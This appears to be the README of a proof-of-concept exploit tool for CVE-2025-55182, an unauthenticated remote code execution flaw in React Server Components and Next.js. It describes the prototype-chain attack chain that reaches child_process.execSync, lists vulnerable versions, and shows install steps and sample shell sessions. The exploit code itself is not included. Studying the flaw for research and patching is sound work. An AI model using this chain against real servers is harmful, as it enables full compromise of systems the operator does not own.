Proof-of-concept exploit for CVE-2025-55182, a critical unauthenticated RCE in React Server Components. Includes automated Python exploit, technical analysis, detection rules, and lab environment setup for authorized security testing.
A comprehensive proof-of-concept exploit and educational resource for CVE-2025-55182, a critical remote code execution vulnerability affecting React Server Components with a CVSS score of 10.0.
FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY
This tool is provided for educational purposes and authorized security testing only. Unauthorized access to computer systems is illegal under various laws including the Computer Fraud and Abuse Act (CFAA) in the United States and similar legislation worldwide.
You must:
The author and contributors:
By using this tool, you acknowledge that you understand and agree to these terms.
React2Shell is a critical vulnerability discovered in December 2025 that affects React Server Components (RSC) and frameworks implementing them, particularly Next.js. The vulnerability allows unauthenticated remote code execution through a single crafted HTTP request.
This repository contains:
| Field | Details |
|---|---|
| CVE ID | CVE-2025-55182 |
| CVSS Score | 10.0 (Critical) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Impact | Complete system compromise (RCE) |
| Disclosure Date | December 2025 |
create-next-app are exploitableVulnerable versions:
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0Patched versions:
Vulnerable versions:
Patched versions:
The vulnerability exists in the requireModule function within React Server Components' deserialization logic:
function requireModule(metadata) {
var moduleExports = __webpack_require__(metadata[0]);
return moduleExports[metadata[2]]; // VULNERABLE LINE - Prototype chain traversal
}
The flaw allows attackers to traverse JavaScript's prototype chain through the React Flight protocol, accessing the Function constructor via properties like constructor.constructor, enabling arbitrary code execution.
__proto__ to create self-referential structureconstructor.constructor to access Function()child_process.execSync()┌─────────────────────────────────────────────────────────────┐
│ Attacker sends multipart/form-data with Next-Action header │
└──────────────────────┬──────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ Server deserializes payload via React Flight protocol │
└──────────────────────┬──────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ Fake chunk object with __proto__ pollution processed │
└──────────────────────┬──────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ Blob handler invokes _formData.get(_prefix + id) │
└──────────────────────┬──────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ Resolves to Function("malicious_code") │
└──────────────────────┬──────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ Arbitrary code executed with Node.js process privileges │
└─────────────────────────────────────────────────────────────┘
requests library# Clone the repository
git clone https://github.com/yourusername/react2shell-poc.git
cd react2shell-poc
# Install dependencies
pip install -r requirements.txt
# Make script executable (Linux/macOS)
chmod +x react2shell.py
requests>=2.31.0
urllib3>=2.0.0
python3 react2shell.py
╔═══════════════════════════════════════════════════════════╗
║ React2Shell (CVE-2025-55182) PoC ║
║ CVSS 10.0 - Critical RCE ║
║ ║
║ Affected: React 19.0.0, 19.1.0, 19.1.1, 19.2.0 ║
║ Next.js ≥14.3.0-canary.77, 15.x, 16.x ║
║ ║
║ Cerberus Secure - Lab Use Only ║
╚═══════════════════════════════════════════════════════════╝
[?] Enter target information:
Host (e.g., localhost or 192.168.1.100): localhost
Port (e.g., 3000): 3000
[React2Shell]> id
[*] Target: http://localhost:3000/
[*] Command: id
[*] Building exploit payload...
[*] Sending exploit request...
[+] Response Status Code: 200
[*] Parsing response...
╔═══════════════════════════════════════════════════════════╗
║ COMMAND OUTPUT ║
╚═══════════════════════════════════════════════════════════╝
uid=1000(node) gid=1000(node) groups=1000(node)
[React2Shell]> whoami
[React2Shell]> pwd
[React2Shell]> ls -la
[React2Shell]> exit